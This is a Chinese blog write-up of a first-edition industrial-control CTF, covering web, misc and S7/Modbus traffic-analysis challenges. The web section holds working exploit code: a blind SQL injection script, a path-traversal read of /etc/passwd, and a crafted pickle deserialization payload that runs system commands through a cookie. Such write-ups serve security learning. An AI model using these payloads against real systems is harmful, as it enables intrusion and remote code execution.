首届网刃杯工控ctf WriteUp

除了分数机制有点怪,题目整体还挺好的。

WEB

ez-sql

原题:InCTF 2021 Web 部分题解 · 语雀 (yuque.com)

import requests 
url = 'http://116.62.239.41:4323/?sql1=%2561%2527%2561&sql2='


s = '}{zaqwsxcderfvbgtyhnmjuiklop0123456789.'


def strtohex(s):


    ss = "0x"


    for i in s:


        ss +=  str(hex(ord(i))).replace("0x",'')


    # print ss


    return ss
flag = '53a2d36d72760586dfc400e54b54'
flag=''
for j in range(1,100):
    for i in s:
        if j >= 1 and j <=6:
            payload = strtohex(flag + i + "%")
        else:
            payload = strtohex("%" + flag[-6:] + i + "%")
        # payload = strtohex(flag + i + "%")
        sql = f'password,username from user where password like {payload} union select 1'
        res = requests.get(url+sql).text
        # print(res.text)
        if res == 'nop':
            flag += i
            print(flag)
            break
        if i == ".":


            print(flag)
            exit(0)

ez-web

?pic=/etc/passwd,存在目录穿越,会返回一段图片base64,解密是源文件,

经典/app/app.py,访问获得源码

简单审计,考点是pickle反序列化,

从零开始python反序列化攻击:pickle原理解析 & 不用reduce的RCE姿势 (zhihu.com)

结合命令执行漏洞和任意文件直接拿下

import requests
import pickle
import base64


#e = 'ls / -a'
e = 'cat /.ffffffffllllllllllllaaaaag'
s = pickle.dumps(e)
# print(s)
payload = b'c__main__\nUser\n)\x81}(V__setstate__\ncos\nsystem\nubV' + \
    e.encode()+b' > /tmp/1.txt\nb.'
response = requests.get("http://116.62.239.41:4322/?pic=/tmp/1.txt",
cookies=dict(
    user=base64.b64encode(payload).decode()))
for l in response.content.decode().split("\n"):
    if "base64" in l:
        l = l.split("\"")[1].split(",")[1]
        print(base64.b64decode(l).decode())

拿下

图片[1]-首届网刃杯工控ctf WriteUp-魔法少女雪殇

MISC

签到题

下载,两个txt,cipher和flag,flag.txt0宽隐写,解密后获得

图片[2]-首届网刃杯工控ctf WriteUp-魔法少女雪殇

myself指flag.txt,md5然后rabbit解密即可

图片[3]-首届网刃杯工控ctf WriteUp-魔法少女雪殇

Baby-Usb

没啥好说的。。。

FzWjScJ/knm: 鼠标键盘流量包取证 (github.com)

工具直接提流量,然后获得结果

congratulationsonfindingmebutiwillnottellyouwherethepasswordofworddocumentisgoandfinditagain

但是没啥用,可能存在删除之类的操作,这里写了个脚本,直接看完成的

#!/usr/bin/env python
#coding:utf-8
#coding:utf-8
import sys
import os
import re


DataFileName = "usb.dat"


presses = []


normalKeys = {"04":"a", "05":"b", "06":"c", "07":"d", "08":"e", "09":"f", "0a":"g", "0b":"h", "0c":"i", "0d":"j", "0e":"k", "0f":"l", "10":"m", "11":"n", "12":"o", "13":"p", "14":"q", "15":"r", "16":"s", "17":"t", "18":"u", "19":"v", "1a":"w", "1b":"x", "1c":"y", "1d":"z","1e":"1", "1f":"2", "20":"3", "21":"4", "22":"5", "23":"6","24":"7","25":"8","26":"9","27":"0","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"<tab>","2c":"<SPACE>","2d":"-","2e":"=","2f":"[","30":"]","31":"\\","32":"<NON>","33":";","34":"'","35":"<GA>","36":",","37":".","38":"/","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>","4f":"<右方向>","50":"<左方向>","51":"<下方向>","52":"<上方向>"}


shiftKeys = {"04":"A", "05":"B", "06":"C", "07":"D", "08":"E", "09":"F", "0a":"G", "0b":"H", "0c":"I", "0d":"J", "0e":"K", "0f":"L", "10":"M", "11":"N", "12":"O", "13":"P", "14":"Q", "15":"R", "16":"S", "17":"T", "18":"U", "19":"V", "1a":"W", "1b":"X", "1c":"Y", "1d":"Z","1e":"!", "1f":"@", "20":"#", "21":"$", "22":"%", "23":"^","24":"&","25":"*","26":"(","27":")","28":"<RET>","29":"<ESC>","2a":"<DEL>", "2b":"<tab>","2c":"<SPACE>","2d":"_","2e":"+","2f":"{","30":"}","31":"|","32":"<NON>","33":"\"","34":":","35":"<GA>","36":"<","37":">","38":"?","39":"<CAP>","3a":"<F1>","3b":"<F2>", "3c":"<F3>","3d":"<F4>","3e":"<F5>","3f":"<F6>","40":"<F7>","41":"<F8>","42":"<F9>","43":"<F10>","44":"<F11>","45":"<F12>","4f":"<右方向>","50":"<左方向>","51":"<下方向>","52":"<上方向>"}


def main():
    # get argv
    pcapFilePath = sys.argv[1]
    
    # get data of pcap
    os.system("tshark -r %s -T fields -e usb.capdata > %s" % (pcapFilePath, DataFileName))


    # read data
    with open(DataFileName, "r") as f:
        for line in f:
            presses.append(line[0:-1])
    # handle
    result = ""
    for press in presses:
        print press
	press=press.replace(":","",-1)
	print "press[0:2] "+press[0:2]
	try:
		b="0x"+str(press[0:2])
		print b
		a=int(b,16)
		if press[0:2] == "00":
		    print press[4:6]
		    if press[4:6]!= "00" and normalKeys.get(press[4:6]):
		        result += normalKeys[press[4:6]]
		elif a & 2 or a & 32: # shift key is pressed.
		    if press[4:6] != "00" and normalKeys.get(press[4:6]):
		        result += shiftKeys[press[4:6]]
		else:
		    print("[-] Unknow Key : %s" % (press[4:6]))
	except:
		print("1")
    print("[+] Found : %s" % (result))


    # clean the temp data
    os.system("rm ./%s" % (DataFileName))




if __name__ == "__main__":
    main()
图片[4]-首届网刃杯工控ctf WriteUp-魔法少女雪殇

把被删的字符连起来,获得:

the key is qazwsxedcrfv

解密word,获得flag

协议解析

藏在s7里的秘密

wireshark直接过滤s7,发现该数据包开始存在PNG头

图片[5]-首届网刃杯工控ctf WriteUp-魔法少女雪殇

将后续几个流量包的内容拼接后存为png

图片[6]-首届网刃杯工控ctf WriteUp-魔法少女雪殇

嗯,png高度,改下就出了

图片[7]-首届网刃杯工控ctf WriteUp-魔法少女雪殇

老练的黑客

题目附件好像都是一个,,,

2021CTF工业信息安全技能大赛-损坏的风机_夜白君的博客-CSDN博客

啊,反正都差不多,就过滤modbus

然后题目说5000,5000的16进制是1388,找比1388大的data就可以了

图片[8]-首届网刃杯工控ctf WriteUp-魔法少女雪殇

盯住写流量

图片[9]-首届网刃杯工控ctf WriteUp-魔法少女雪殇

找到第一个data,第二个题目说是读取错误,那就是write后面的read

图片[10]-首届网刃杯工控ctf WriteUp-魔法少女雪殇

flag就是flag{22b81194}

© 版权声明
THE END
喜欢就支持一下吧
点赞3 分享
评论 共4条
头像
欢迎您留下宝贵的见解!
提交
头像

昵称

取消
昵称表情
    • 头像0ot0
    • 头像Blac0